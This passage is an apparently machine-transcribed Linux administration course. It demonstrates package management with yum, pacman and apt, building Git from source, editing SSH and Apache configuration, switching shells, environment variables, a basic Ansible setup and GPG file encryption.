that newly added repository. But we'll take a look at how to manage repositories and work with that using apt in another demo. In this demo, we're going to take a look at how to manage Linux repositories and updates using Yum. Yum is a command line tool. It's a utility that's designed to work with RPM or Red Hat Package Manager packages so that you can work with installing and updating software on a host. Now, in our example, we're going to be using a Red Hat Enterprise Linux host because it uses Yum natively. The first thing I'll type in is yum-help. So from here, I get command line parameters that can be used with the Yum command line utility to manage packages and to manage repositories. For instance, if I were to type, let's say, sudo yum space repo list, I get a list of repositories. Notice that they are designed in this case for this distribution of Linux as Red Hat Enterprise Linux version 7. But I have a list of repositories. This means these are the places that will be checked out on the internet when I choose to install software packages or if I want to upgrade anything that I already have installed locally from new updates available out in these repositories. If I were to do an ls here in Red Hat Enterprise Linux of /etc yum.repos.d, that's a default subdirectory, notice we've got a number of files that are here. For example, one is called redhat.repo. So if I cat that file, cat/etc/yum.repos.d/redhat.repo, I get a message here stating this is an auto-generated file that is managed by the Red Hat Subscription Manager, RHSM. So some Linux distributions will have their own specialized way of managing some of these packages and repositories. Another important aspect here of working with yum is checking to see what's installed. So if I were to run sudo yum list installed, there's a space between each of those words. Let's say I pipe that to the more command. Here I have a list of all of the specific packages that are installed on this host. And what's important besides the name of it, of course, is the version string that goes along with that, shown in the second column from the left. Now what I could do is run that same command, but pipe it to the grep line filtering utility. And let's say we're checking to see which Python packages are installed. So I'll specify Python as my criteria. So here we have a listing then of the installed packages that Yum was able to identify are installed on this host related to Python. It's always important to make sure that your repository listing and the indexes of available software packages are kept up to date. You can do that here with sudo yum check-update. And if you wanted to apply updates for things that are already installed, you could run sudo yum update. I'll press enter. So I'm being told that the total download size, if I choose to update installed packages, is 339 megabytes. Is this okay? I'll type in the letter Y for yes, and I'll press enter. And after a few moments, it says complete. So we've updated the packages installed on this machine from the repositories. But what about if we want to install something new? Let's say we were to run sudo yum search Docker. I want to install the Docker service so that I can run containerized applications. So here I have all kinds of options shown here, including things like the Docker client, Docker tooling toolkits, and various other utilities related to Docker. If I were just to type sudo yum info docker, just on the Docker package itself, then I get the details related to it. So the name, the architecture, the version, which is always of paramount importance, and the release string, the size, which is important as a consideration as it will use or consume disk space on this Linux host. And if I decide I want to install it, I can go ahead and do that with sudo yum, let's say -y, because it's going to prompt me, are you sure you want to install this? And I just want to force yes into the command. Install Docker, enter. Okay, so it's in the midst of installing the Docker service on this host. Before long, it says it's complete. So if I were to run sudo service docker status to see if the daemon is running or not, it says inactive, dead. So we can go ahead and just use the up arrow key and change status to start the service, and then we check the status. Now it's showing as being active and running. So the Docker daemon is up and running, which means it's active on this host. Also, if I were to type in Docker for the Docker CLI, the command line interface, it gives me the next level commands in terms of help, which is telling me, of course, that Docker is installed on this host, but we already know that. If we wanted to update just the Docker package, we could run sudo yum update, and we can name the package by name, in this case, Docker. But then it returns here that there are no packages marked for update, as there are no updates because we've just installed it. Of course, it's also important to know how to remove stuff here. If I run sudo yum -y, since it's going to ask me yes or no, remove Docker, enter. It shows that it has completed the removal of the Docker service. So if I were to run sudo yum list Docker, notice it shows what's available in terms of packages to be installed. So it's no longer installed here. Now, if you're working with Red Hat Linux systems, it's also important to know, of course, that you can just also use the RPM, the Red Hat Package Manager command line tool, such as RPM-i for installing packages, RPM-e, that's lowercase e for erasing packages, and of course, there are many other command line parameters available for RPM. You can get a listing of those with descriptions by viewing the man page for RPM. Man, RPM. Let's take a few minutes to talk about repositories and software package installation using the Pacman utility. That's Pacman, kind of like the video game, except here we're talking about it in the context of being a command line utility that we can use to manage repositories and software on some Linux distributions such as Arch Linux. So I've got an Arch Linux host ready here. Let's begin here by running sudo cat of /etc/pacman.conf, so the configuration file for the Pacman package manager. Notice one of the things it's doing within this file is it's including /etc/pacman.d/mirrorlist. Okay, so we need to take a look at that. Let's run sudo cat /etc/pacman.d/mirrorlist. This is what we're looking for. This gives us these specific repositories, the URLs, some of which begin with HTTPS, others are HTTP, others are rsync repositories. But these are the standard Arch Linux repositories that will get checked when we choose to install software packages on this Arch Linux host or if we choose to update them. Now, of course, you can also add custom repositories to this list if you so choose. As an example, here in my web browser, I've navigated to wiki.archlinux.org and I've searched for unofficial user repositories. And this gives me a list of them. Of course, you want to be very careful with this, especially from a security standpoint. Do you want to install software from something that might not have been properly vetted and deemed as being trustworthy? But nonetheless, here we have a lot of references to some URLs for different package repositories, which means you would get access to different software packages that you otherwise might not have access to. Now, be aware that you might have a keyring file here. In other words, you might have to download a public key for some repositories that use digital signatures so that your machine trusts the digital signatures from that provider. And that is true not only in Arch Linux, but using a variety of different repositories. Even, let's say, if you're using Yum with Red Hat Enterprise Linux, some of the repositories might use digitally signed software packages. You might need the related public key installed on your machine so that your machine trusts those packages. Otherwise, they may not be allowed to be installed. Okay, so back here in Arch Linux, let's run sudo pacman -S lowercase y and a lowercase u. What this is going to do is check to see what needs to be updated in terms of packages installed on this host. So it's determined that there are many packages installed. For example, we have a number of references here to different Python utilities with the version strings. And down below, it gives me the total download size, which here is about 550 megabytes. Then the total install size, once we extract and install those updates, and then the net update size. So it asks, proceed with the installation. I'll type in Y and I'll press enter. Now, for some software packages already installed, we might be prompted whether or not we want to trust the PGP signatures by importing a PGP key. If we've got errors, we might be prompted to delete corrupt versions of keys. That could prevent certain packages from being validated and, as a result, installed or updated. Some other important things here, of course, would include installing packages using Pacman. So, sudo pacman -S lowercase s. What I'm doing here is I am searching, I'm querying, is Docker available to be installed? Because I've specified the Docker software. So here I get a list of all kinds of different software packages related to the word Docker. So yes, there's plenty here that can potentially be installed. Is it already installed? Well, we can do that with sudo pacman -Q for query lowercase s, and then I'll tell it I'm looking for Docker. Now we get no returned output. So of course, that's telling us that there are no Docker components installed. The Docker package is not installed on this machine. Let's go ahead and install it. sudo pacman -S and then the name of the package, in this case, Docker. I'm given the total download size as opposed to the total installed size, and I'm asked if I'd like to proceed with the installation. I'll type in Y for yes and press enter. It's downloading and installing Docker. Once that's been completed, we'll be given back our command prompt. Here it looks like it's created some system user accounts, and we are ready to go. So here in Arch Linux, I could then issue the command sudo systemctl status Docker. Is Docker up and running or not? Well, it knows about the Docker application container engine, but it's currently inactive. So I could use the up arrow key and go back to that previous command and change the word status to start. And if we use our up arrow key again and go back and check the status of Docker, notice, of course, now it's active and running. So we know that it's there. Also, at the command line, if I simply type in Docker, the next level command set is shown as help, which tells me that the Docker CLI has been successfully installed. And lastly, if I decide I want to remove a package that I've installed from a repository, I can run sudo pacman -R for remove, lowercase s, Docker. It asks, would you like to remove these packages? It gives me the total removed size. I'll type in a capital Y for yes and press enter. And then the software is now removed from this host. In this video, I'll be working with Linux repositories and software packages and updates using apt. apt is a command line tool that's built into most Debian-based Linux distributions. We're going to be using Ubuntu Linux here, which is Debian-based, and so therefore, apt is available automatically as a package management tool. So apt uses repositories, and of course, just like other tools like Pacman and Yum, those software management tools also refer to repositories, centralized collections of software packages to get software to install on Linux hosts or to update as changes are made in the repositories. And repositories can either be a server available over a network, like over HTTP, or it could be a local subdirectory where you've got installation files available. So to examine repositories a little bit, here on my Ubuntu Linux machine, I'm going to run sudo cat /etc/apt/sources.list. And here I've got a number of different sources here for Debian-based packages. Now, of course, if you wanted to, you could add other repositories to this list so they too would be used when you query for software packages and then install them, update them, that type of thing. If I run sudo apt update, those are all separate words, then what it's doing is checking all of my configured sources in the sources.list file, my repositories, to make sure that they are available and up to date, and that I have an index of the software packages available from each of them, which is also up to date. Notice it automatically tells me down at the bottom here that we've got 61 packages that can be upgraded. Notice that the command we used up above was update, not upgrade. So if I were to run sudo apt upgrade, this will upgrade all of the installed software packages on this host to their newer versions. And normally, before you perform an apt upgrade, you should perform an apt update to make sure your package repository indexes are up to date. So it asks if I want to continue because it's going to download a certain amount of files and it's going to use a specified amount of additional disk space. I'm going to type in capital letter Y for yes. Let's do it. Let's get things up to date here. Okay, before too long, it's been completed. The updates have been applied, and as where required, some services have been automatically restarted. I'll clear the screen. We can also run the sudo apt list command to get a list of installed packages on this host. We also get the version string along with it, which is always important. I can also run sudo apt install. In this case, let's say I want to install docker.io. I know that's the name of the package. It asks, do you want to continue? I'll type in the letter Y for yes and enter. When you're managing software packages in Linux and also working with repositories from which that software is pulled, it's important to understand how to install and also remove software components. So if I were to run sudo apt list, pipe that to grep and look for docker.io, docker.io is now shown here. If I were to type in the Docker command, it knows what it is, so the CLI is installed. If I were to run sudo service docker status, the daemon has automatically been launched, so it's now shown as being active and running. So we can now run our containerized applications. Of course, if we want to remove that software, we can also run sudo apt remove, in this case docker.io. As you might expect, it tells me how much disk space will be freed up if I were to proceed with the removal, so I'll type in the letter Y to do just that. Now I can use the command line to add additional software package repositories. For example, sudo add-apt-repository, and that would have to know what the string was for that. So it's going to be a Debian package archive with the 64-bit AMD architecture. I've got the URL, and down at the bottom it asks me to press enter to continue or Control-C to cancel. Okay, so it tells me that it's adding some of these entries here to the sources.list file, but notice it says it couldn't verify a certain number of signatures because the public key is not available. Okay. Well, when you're working with software package repositories and signed software, the signature is done or created with a private key. You need the related public key on your Linux host to be able to trust those items. And out here in my web browser, there are many different instruction sets on how to import public keys, depending on what software you might be interested in from a particular repository. So here I'm going to use the sudo apt-key command to add a key. And what I've done here is I've installed the public key for MongoDB, that database package. So if I were to use my up arrow key to go back to the command where we were running add-apt repository, if I press enter to continue with that, it will have been added. So now you have the ability to pull down software from a different location. A well-rounded Linux technician should have the ability to build Linux software from source. What this means is that we've got the source code created by the developer, but it's not yet been compiled. So as Linux technicians, we can take it upon ourselves to download that source code, install the appropriate dependencies, and perhaps even install a compiler for the appropriate language, compile the installation files, and then actually install them. In some cases, with some software, that is what you will need to do. Ideally, you'll simply be able to use a package manager tool like apt or yum or Pacman to install software packages, but unfortunately, it's not always quite that simple. So the first thing I'll do here on my server is I will make a directory in my current home directory called downloads. I'll change directory into the downloads directory, and then I'm going to download some source code. In this case, I'm going to download the source code for Git. Git is often used by software developers for software version control when programming, although it's not limited to only that use. So I'm going to use the built-in curl command to download the source file, which means I need to know the URL. So curl --output, I'll give it the file name, which is going to be in this case git.tar.gz, so it's a compressed archive. Then I'll give it the URL, which in this case starts with https://, and I'll point all the way down to the actual file itself. So the file is now downloading into the current directory. So there's the git.tar.gz file. So naturally, now I'm going to run tar-zxf. The Z means it's compressed, X is extract, and file is the file name, which we'll specify here. What it will have done is created a Git subdirectory. If I change a directory into that new subdirectory and do an ls, there's all kinds of programming files here. We've got some .c files, for example. Let's just cat the lockfile.c file for fun. So cat lockfile.c. This looks like C programming language code, and indeed, it is. This is the actual code that's used for that particular functionality. So there's a lot of them in here. What I want to do is check for a configure file, and there is a configure file here. If I do a long listing for configure, notice it's got read, write, execute for the owner. Of course, I am listed as the owner as I downloaded it and extracted it here in my home directory. The purpose of the configure script here, in this case, is to check to make sure that we have the appropriate compiler. So we're going to need a C compiler in this case to compile that to binaries, and that any dependent software that is referenced is also available. So if that all checks out, then the configure script will generate a make file. So here's what we're going to do. We're not going to change anything. We're just going to run /configure. Now, in some cases, you might have to install some other dependencies first. So notice it's telling us that there's no acceptable C compiler found within our $path variable. So I'm going to run sudo apt install gcc. This is a standard C compiler. It asks, do you want to continue? I'll type in Y for yes. It's pretty hard to compile source code if you don't have a compiler installed. Okay, let's run /configure again. This time, things look quite different because we have a C compiler installed. Then I'll run the sudo make command. So what this is doing is actually generating the binary installation files. Now, if you get any errors when you run /configure or make, be sure to check the installation instructions. So for example, here we've got the installation instructions for installing required packages. It's quite crucial that these packages are installed in order for building from source to be successful. And you can't predict exactly what will be required unless you go through all of the programming code. It's much easier to refer to the appropriate documentation to install the packages that are needed. So once that's completed and we've run make install, if we were to run git --version, it reports back the version of Git that is installed. So in times when you need to build software from source code, you can do it using this method. In this demonstration, I'm going to be managing Linux configuration files. Now, depending on what you've got installed on your Linux host will really determine how many configuration files you have. Of course, there are plenty of config files there by default with any Linux system, regardless of distribution. So, for example, we know that Linux config files live in or under etc. So if I change directory into etc and just do an ls to list, we've got all kinds of config files here. In many cases, config files end with .conf, C-O-N-F, or .cfg, but they don't have to. However, in some cases, some products that you've installed might have their own subdirectory, like the uncomplicated firewall here, or UFW, where if I change directory into UFW, and if I were to do an ls in there, then we get a list of the config files for that particular software, that particular service, in this case, for the UFW firewall. So let's go ahead and go back into etc, and what I'm going to do is change directory to SSH, so secure shell for remote management. Here, if I do an ls, we've got a number of files, like an SSH_config versus an SSHD_config. Now, in some cases, with some network services, if you have a client and a server component, the server component is often referred to with the D as in daemon. It's a background daemon that's always running and listening, in this case with SSH, on TCP port 22. So the SSHD_config is for the daemon, the server, and SSH_config is for the client. So if I were, for example, to cat SSH_config, we'd be looking at settings for the SSH client if we're going to be using this as a client machine and reach out to other devices to manage them. Whereas if I cat SSHD_config, of course, what we'd be looking at are server settings. Now, if we look through our SSHD config file, notice that what it's doing is including a number of configuration files in its own subdirectory under etc SSH called SSHD_config.d, looking for conf files in there. And that's normally the case with a lot of modern Linux services that you install. You'll have a parent or a global config file, such as what we are in right now, that includes a reference to config files in another location. However, there are still some settings that we can modify here, like the listening port number. These are all listed default settings like port 22, but it's commented out. You could uncomment it by removing the hashtag symbol or the pound symbol at the beginning, change it to something else, and restart the service or the daemon. However, if we do an ls in here, notice that we also, so let's change directory to SSHD_config.d, and in here, let's do an ls. Okay, so here we've got a conf file that is used by our SSH daemon. If we were to run sudo cat against that config file, there's not much in here other than saying password authentication yes. So in other words, the SSH server is not configured solely for public key authentication, where the public key is on the server. The connecting technician has the private key on their machine. Password authentication is allowed as well. Let's go ahead and run sudo apt install apache2 to install the Apache 2 web server. I'll type in Y for yes to get it installed. Then we'll take a look at its configuration files. Okay, so I'm going to change directory into /etc/apache2, which will now exist because we've installed the Apache server. If I do an ls, here we've got an apache2.conf file. Let's cat that. So like most config files, it's got a bunch of comments. It's got a couple of active items. And as we go further down through the config file, as is common, we have an include statement, for example, here, referring to the ports.conf file in the same subdirectory. If we do an ls, indeed, there is a ports.conf. And if we cat that file, actually, let's edit it just for kicks. sudo nano ports.conf. Currently, it's set to listen on port 80. Let's test connectivity to this server. If I type IPA, the server's address is 10.0.0.4. So if I were to type wget http://10.0.0.4, so if I were to type sudo wget http://10.0.0.4 and press enter, it made a connection to our web server. The default is port 80, and we've got the index.html file. That's great. Let's go back into the ports.conf file and change the listening port, let's say, to 82. So we're making a change to a config file. I'll go ahead and save that. And we're going to run sudo service apache2 restart the web server. I'll clear the screen. We're going to run our sudo command. I've used the up arrow key to go back through our command history where we ran wget. But this time it says failed connection refused. Well, that's because the default listening port is 80 and it's implied. But if we were to run our wget command against that URL, but at the end, add, let's say, :82 for port 82, since that's what the web server is configured to listen on. This time it worked. So naturally, the details about making changes to configuration files will vary wildly depending on the nature of the software or the service. But it's important to get used to the fact that most config files exist in or under /etc. Most of them are text files. You can use a text editor if you have permissions to make a change to the config file and save it. And if there's a software component running in the background like a daemon, just be sure to restart it to put those new changes into effect. Let's talk about how to manage Linux shells. So what is the shell? Well, as we've discussed, a Linux shell is used either interactively by users by typing in commands, it's what gives you a command prompt, or of course, a shell might be invoked by a specific shell script. You might be using a bash shell on your Linux system, for example, and you might launch a shell script that uses a different shell, like a corn shell or a C shell, only while the script is running. So you can switch back and forth between shells through scripts or manually at the command line. Of course, the binaries for those shells would have to be installed. Let's start here by doing a cat of /etc/password, PSSWD, the user account file. Let's pipe that to grep because I have a user in mind. I'm looking for user mbishop. Now what I'm interested in the returned output is the very last field. The field delimiter in etc password is a full colon, of course. So this is for the user account mbishop. Well, the last field defines the shell that should be spawned when that user signs in. So notice here it's /bin/sh. If I were to type where is sh, it tells me it's in /usr/bin, and there it is. If I do an ll of /usr/bin/sh, it's a symbolic link pointing to something called dash. Dash is kind of like a bash shell, but kind of a newer version of bash. And depending on the Linux distribution you're using and the version of it will really determine if the sh command is actually a symbolic link or not and what it's pointing to. But in this case, with Ubuntu, that's what the case is. Now that stems from the 1970s where the shell command, or sh, that was the standard shell used in Unix environments. And so it persists to this day, even though nowadays it's actually pointing to something else. So if I were to type sh right here in my Linux command prompt, it takes me into a dash environment. Notice my command prompt changes. I get just a $, as opposed to having the $sign with the prefix of my username and the host on which I am connected. If I type exit, I'm back at my regular shell. If I were to try to launch a different shell like KSH, a corn shell, it says it's not here. No problem, we can install it. sudo apt install mksh. And after a moment, it's installed. So now, if I were to try to switch to the corn shell by typing ksh, I'm now in. I'm in a different command prompt environment. I could type exit to get out of it. In the same way, if I wanted to start a C shell, csh, same thing, it's not there. Let's just get it installed for fun. sudo apt install csh. And just like that, it's done. So if I were to launch a C shell, csh, notice this one's a little bit different. Instead of a $sign for a command prompt, I get a % symbol when I'm in a C shell. Now remember, some of the differences between these shells will include things like how they handle variables, some command line syntax, how they handle looping, such as within shell scripts. And speaking of shell scripts, let's just exit out of here. If I were to run, let's say, sudo nano, let's create a script called script1.sh. Doesn't have to have an sh extension. Normally, for convention purposes, so it's standard, if it's a C shell written script written for that command interpreter, then it will have a .csh extension. If it's written to use the syntax specifics of a corn shell, it might have a ksh extension. Doesn't have to, but that's the norm. Let's go ahead and create a new script. The first thing you should do within a script is start with an exclamation mark, a hashtag or a pound symbol, and then the script interpreter you want to use, such as /bin/bash, or it could be a reference to the C shell, the corn shell, whatever the case might be. Now, this is important because that shell interpreter needs to be installed on the machine where you're going to run this script. So, for example, imagine that we make a reference to a different type of shell, like a corn shell, that isn't installed. Well, then the script won't be able to run correctly. This line at the top of the script where you define the shell interpreter is called the shebang line. That's what they call it. So the script might do any one of a million things. It could be anything. Let's say all we want to do is echo back the $cost center variable. Variable names are case sensitive, so let's assume we've already got a variable defined somewhere called cost center. Maybe we'll just add a clear statement at the beginning to clear the screen. At any rate, the script might do much more. We'll focus on that later on. But the point is the shebang, the first line within that shell script. Make sure you put that at the top of all of your scripts. Now, there are some other small little things that will vary from one shell type to another. For example, if I go back into my C shell by typing CSH, if I type ls, well, that command works. If I were to type sudo nano and type in scr and then press tab for tab completion, it doesn't work in the C shell. Of course, if I go back to my regular bash shell and type sudo nano, type scr, press tab, it has tab completion. It spells out the file name for me. So you'll see some other tiny little feature variations like that between different shells. If, for example, you prefer to use the Korn shell, the Korn shell is considered to be faster than a standard bash shell. So depending on what you're doing with scripting, it might be important to use that. It's got more programmer-like flexibility and features, which can also make it less readable than bash scripts, but you can do it. But if you wanted to switch what a user signs in with, don't forget that the etc password file defines the shell that will be used by users. So if you want to control that, you can do it. So sudo nano/etc/password. Let's go all the way down to the line for mbishop. Let's change the default shell for that account. So let's say I want to set the login shell for mbishop to be /usr/bin/csh, the C shell. Okay, I'll get out of here and save that change. And we're going to sign in with switch user, su. I want to keep my current login session active, dash to run the entire login environment, and then the name of the account, mbishop. And then I'll enter the password. And just like that, we're signed in as user mbishop, but notice our command prompt is just a %, which indicates that we are now signed in automatically using a C shell type of environment. I can simply type exit to get back to my previous shell. In this video, the focus is going to be on working with environment variables in Linux. Now that means working with them both at the command prompt, and that may vary from one shell to another, such as a C shell, a Korn shell, or a bash shell. Environment variables might be handled a little bit differently. We'll also see how it's handled within a shell script. So let's take a look at this. Now, what is an environment variable? Well, an environment variable is essentially a storage location in memory that retains a value that you store in that variable. What could that value be? It could be anything. It could be the name of a cost center, the name of a city, an employee ID, an IP address of a server. It could be anything. So here in Linux, I'm using bash, where I can just type env, which of course stands for environment, to return a list of all of the environment variables set right now in my login session, followed by their values. For example, I have an environment variable called SSH_connection. Notice in uppercase letters, when you refer to variables, it is case sensitive in Linux, so you have to be careful of that. And I've got a value stored after the equal sign. It's shown right here in the output. So we've got a lot of variables here. Of course, the path variable is always important as well, as it's used, of course, to locate binaries that we might type in from any location in the file system hierarchy. I could use the env command and pipe that to grep, and if I know what I'm looking for, let's say path, uppercase, or if I don't know if it's uppercase or not, of course, with grep, I can use dash lowercase I for case insensitive. There's the path variable, again, along with its value. Looks like there are a couple of references to path here. I can also display the value stored in a variable here in a bash shell just by typing echo $path, and it returns only the value stored within that variable. Now, those are existing variables that are set when I log in, but I can also create my own variables. Let's say I want to create a variable called cost center, and I'm using a capital C for cost, capital C for center, and as we know, when we refer to this, it is case sensitive. To write a value into that, a literal text string, let's say, I could put an equal sign, and in double quotes, let's say I'm going to put in the word Toronto. So that's all we need to do. If I want to echo it back, well, we now know we can echo back $. So a $sign is a prefix when you want to work with an existing variable's value. But notice if I put cost center in lowercase letters, we get a whole lot of nothing. If I were to correct that and use the correct case, so capital C for cost, capital C for center, of course, it correctly returns Toronto. But there are also times where you might need to store the result of a Linux command in a variable. Not the text for the command itself, the result of the command. For example, consider this command, IPA. Let's show my IP address information for my interfaces. I'm going to grep it for the word inet, which I'm then going to in turn grep for broadcast, BRD. Okay, well, that worked okay, returned only what I wanted to, what I told it to. Let's say I want to store that in a variable, that entire line. Well, let's use the up arrow key to bring up that previous command. Let's say I'm going to create a variable called capital IP, and it will equal that command. But when I press enter, it says A, command not found. Okay, so it's treating A as a separate command. That didn't work. What if we put it in double quotes? Well, you might be able to predict what will happen here. No error, but when I echo back $IP, capital letters, it literally stored that as a text string. Not my intention. I want the result of that command stored in the IP variable. Here's what you do. If we go back with our up arrow key to our previous main command, instead of double quotes around the command or the expression, use backticks. That's not a single quote, it's a backtick. Usually that's available on the upper left of your keyboard somewhere, wherever you would press the tilde key. What that means is take the result of that expression and store it in the variable. So if I do an echo now of $IP, what do we get? We get the result of that statement and not the statement itself. So that can be a very important aspect of working with variables. Now, if I clear the screen and type env, where is our IP variable? Where is our cost center variable? Well, we know that we can pipe the result of env to grep and look for something like IP. Ooh, nothing. What if we grep it for cost center? And I know I'm spelling these correctly. Nothing. So environment variables are those that are set for your system and can be set also during login, of course. What we can do then to view all of our variables is use the set command instead. Now, it also shows any function definitions that are available, which is what we're seeing here. We've got these names, a space, open, close parentheses, open and closing curly braces. Those are functions. You could also define your own custom functions. But grep to the rescue. If I run set and pipe that to grep, and let's say IP uppercase, aha, there is our IP variable. In the same way, if I grep for cost center with the capital C's, there it is. So that's going to be very important to work with as well. The last thing I want to do is talk about how variable scope works when you invoke scripts. Okay, what I mean by that is if I type ls, I've got nothing in my home directory. So I'm going to create a new script, sudo nano new script.sh, we'll call it. The first line will be the shebang line, which is going to define the shell interpreter that I want to use to run the commands in this script. So exclamation mark, hashtag, /bin, /bash in this case. We'll have the screen cleared with clear. We'll have a blank line with echo. And then I'm going to echo back $cost center and another echo line. Now, we know that cost center is a valid variable right now in our current shell. Now, if you needed that to be persistent across login sessions or reboots, put it in a login script or some kind of startup file on your Linux host. But the cost center variable was not defined within this script. Let's see what's going on here. Let's Control X to save this out to that file. Let's run sudo chmod plus X to add the execute permission to new script.sh. If I run /new script.sh, we get nothing. But wait a minute. If I do echo $cost center, it does have a value of Toronto. But when you start a script, you are spawning a new shell. It's kind of like me typing bash to start a new shell environment. And if I echo $cost center, nothing. It's a different shell. Well, then how do we make sure variables are visible in child shells that might be spawned, whether manually like I've just done by typing in bash or by executing a shell script? The answer is you export the variable. If I were to type export cost center, I could have used this syntax when I was initially setting the value of it, but I can do it also after the fact. Export cost center, no $. So if I echo right here at the command line, echo $cost center, we still have the value of Toronto. If I run my script, new script.sh, it now returns Toronto. It's now visible. The variable is visible to my script because I exported it. So therefore, it is now available in child spawned shells. In this demo, I'm going to focus on how to install and do a very basic configuration to get Ansible up and running. What is Ansible, you might wonder? Ansible is one of those centralized configuration management tools that you might use in the enterprise so that you can centrally manage numerous hosts. In our case, numerous Linux hosts. Now, of course, you could go around to each and every Linux host that required the same configuration and do it manually. Obviously, that does not scale well when you talk about dozens, hundreds, or even thousands of Linux hosts. What you're doing with Ansible is reaching out over the network and applying some kind of configuration or commands to be run on a multitude of managed hosts. So to get started here in Linux, we first will add a software repository from which we can then install Ansible. So to do that, I'm going to run sudo apt-add-repository, and I'm going to add a PPA repository for Ansible. PPA stands for Personal Package Archive. It usually means that you've got a repository that might not be widely accepted as a public package repository on the internet, but it might be maintained by an individual or a group of individuals. And of course, you have to make sure that that makes sense in your environment in terms of security. Do you trust the software from it? In this case, I know I do. And I'll press enter to add that repository. And now that I've done that, I can run sudo apt install Ansible. Okay, once that's done, I'm going to change directory to /etc/Ansible. If that directory is not there, just go ahead and make it. In here, I've already got a file called hosts. Again, you might have a sample file placed there. If I run sudo nano hosts, then it opens up my file. So I've got a header section here defined with the open and close square brackets. And then underneath it, I've listed the IP address of one of my other servers I want to manage here. And I've also added a couple of directives here. I've added Ansible_user equals, and I've provided a user account to use on that remote server. What's going to happen here is Ansible is going to make an SSH secured connection over the network to that host to manage it. But I've also specified Ansible_SSH_pass and provided the password for that account. Now, that might be considered a security risk because you're storing a password in clear text in a file in the file system. If you wanted to, there are other alternatives with Ansible playbooks that might use SSH public key authentication, which means private keys would need to be available to the Ansible server because the public key that's related to it will be stored on each host that needs to be managed. But in this example, we're going to stick with this. I've also got an all vars header section where I'm telling it I want to use a specific version of the Python interpreter on those remote hosts. Now, in a realistic enterprise environment, you would have numerous hosts added here. I only have one in this example. I'm going to go ahead and get out of there. Now, also, if you want to be able to use the SSH password that way for Ansible management, you're going to have to make sure that you install the SSH pass package. I've already got it installed, so we are good to go. The next thing I can do is test remote connectivity. One way to do that is to use the built-in Ansible ping module by running sudo ansible all, meaning I want to try to execute this type of statement on all machines, -m and ping. When I press enter, what I'm looking for output is green text where it says success. And we should get a return listing that looks similar to this output with the success and the IP of the server. You should get that for each and every server in the Ansible inventory file. Well, now this is exciting. We know we've got connectivity over the network through SSH to manage nodes. So now we might test, for example, running regular Linux commands. You can also have more complicated sets of instructions through playbooks, but here with the command, we might do this. sudo ansible all -a, and then we'll pass it our Linux command in double quotes. Let's say ls // which means let's get a listing of what's in the root of the file system. And because I've got all in my command line, this will be performed against all Ansible managed nodes. Of course, we only have one, but you get the picture. Let's press enter. So now we've got our return listing of everything on the root. And if we go back at the top, of course, the header part shows the IP address so that if we had many listings, we'd be able to tell what is what. Now, of course, you can also use output redirection to place that in a file. So if I bring up that Ansible command that we just ran, but at the end, if I tack on a greater than sign, and let's say I'll specify in /home/c blackwell, I want to create a file called root listing ansible nodes.txt. I'll just go ahead and press enter. If I press cd and just enter to go to my home directory, do an ls, there's the root listing file. Let's cat it. Cat the root listing file, and everything is stored within a file now. So output redirection can definitely be your friend if that's the type of thing you might be doing with Ansible. We are talking about having a scriptable and automated way to remotely manage configurations. As a last example, I'm just going to open up a file here in Nano that I've called Ansible_apt-update.yaml. So it's YAML syntax, and this is a playbook file. So I've got it formatted the way it needs to be formatted here to be used by Ansible, where it applies to all of the hosts. And it's going to use sudo on remote hosts. Now, down under the tasks section, I give it a meaningful name of some kind, but I'm calling upon the built-in apt module, part of Ansible, which of course is used for package management on Debian-based Linux machines. I'm telling it to update the cache, and I'm giving it a couple of timeout items as well. There are many built-in modules. We don't have time to cover them all here. Of course, as we're just touching or scratching the surface related to Ansible, you might want to use the built-in file directive or service directive to work with the file system, or maybe to restart services, to list but only a tiny fragment of what is possible with Ansible. But let's go ahead and get out of here, and let's run sudo ansible-playbook, and then we simply give it the path and name of our Ansible playbook file. I'm going to go ahead and press enter. And we can see based on the output, everything is okay for the listed IP address of the remote Ansible node. Of course, it could be more than one, where nothing was failed or skipped. Now, Ansible isn't the only game in town. It works well for smaller to medium-sized deployments in terms of number of managed nodes. For very large enterprise deployments, you could use something similar like Puppet or even tools like Terraform. While the details will certainly be different, the overall underlying concept is the same: centralized desired configuration management. In this demo, we're going to take a look at how to work with file system encryption on a Linux host. We'll start by encrypting an individual file, then we'll talk about how you would go about encrypting an entire disk partition. Let's start with individual file or directory encryption. The first thing I'll need to do is run sudo apt install. I'm going to choose to use the GNU PG 2 package to work with file encryption, although there are many other choices you could potentially choose from. After that, I'm going to run gpg2 -- version just to make sure it's installed and it knows what I'm talking about. And it looks like it's returning back some information about public key support and different cipher or encryption algorithm support, hashing support, and so on. So it knows that we've got GPG installed. If I were to take a look at the man page for GPG, so man, GPG, and enter, there are plenty of things that we can do with this. GPG, by the way, as we see here, stands for GNU Privacy Guard. And as we go down through the man page, there's quite the description, and there are many command line options, and their behaviors are discussed here. Now, we're not going to read through the man page, but this is one of those types of tools where, because it's got so many options, it's impossible to memorize all of them, so the man page becomes very useful. So I'm going to type Q to quit, get out of there, and there we have it. So if I type ls, here in my current working directory, I've got a file called projecta.txt, and if I cat that file, it simply contains some text that says this is sample text for Project A. The point is that we can read it because the file's not yet been encrypted. So to encrypt it, I can do the following. I can run gpg -- symmetric, which means the same key to encrypt will also be used to decrypt. It's in the current directory, so /, and it's called projecta.txt. When I press enter, it asks me for a passphrase. This passphrase is used to encrypt, and it must also be provided for decryption to occur. So I'll enter the passphrase, and it asks me to re-enter it or to confirm it, after which point it has encrypted the file. If we clear the screen and do an ls again, what we have as a result is a file called project_a.txt, so that's the original file name, but it's also got a .gpg extension. Notice the original file, project.a.txt, remains. Normally what you would do is remove that original file and keep only the encrypted file. So I'll go ahead and remove that. So now all we're left with is the GPG file. If I try to cat that file, by the way, notice we get a bunch of scrambled looking characters because the file has been encrypted. Okay, so let's say I want to decrypt that file. So I'd run gpg -- output, and I would specify what I want the output file to be called. Let's say I want to call it the same name, project_a.txt, but it doesn't have to be called the same thing. And then I'll specify the --decrypt parameter, and I'll specify the name of the encrypted file. So project_a.txt.gpg, and I'll press enter. And if I type ls, we've now got our project.a.txt file. So let's cat it, project_a.txt. We're back to having the original file, which could have been called anything, with the plain text within it. Now, our password information has been cached in memory in this session, which is why we were not prompted again. All right, so that's how we might work with individual file encryption. We can also encrypt an entire disk partition. So I'm going to run sudo lsblk --scuzzy. What do we have for devices? I've got device SDE here. So let's run sudo fdisk /dev/sde to create a new partition. So I'll press N for new, P for primary, and I'll press enter to accept all of the defaults, and then Q for quit to get out of fdisk. And I'll clear the screen. Next, I'm going to run sudo apt install. I'm going to choose to install the crypt setup tool. Now, there are many tools, just like there is for individual file encryption, for entire disk 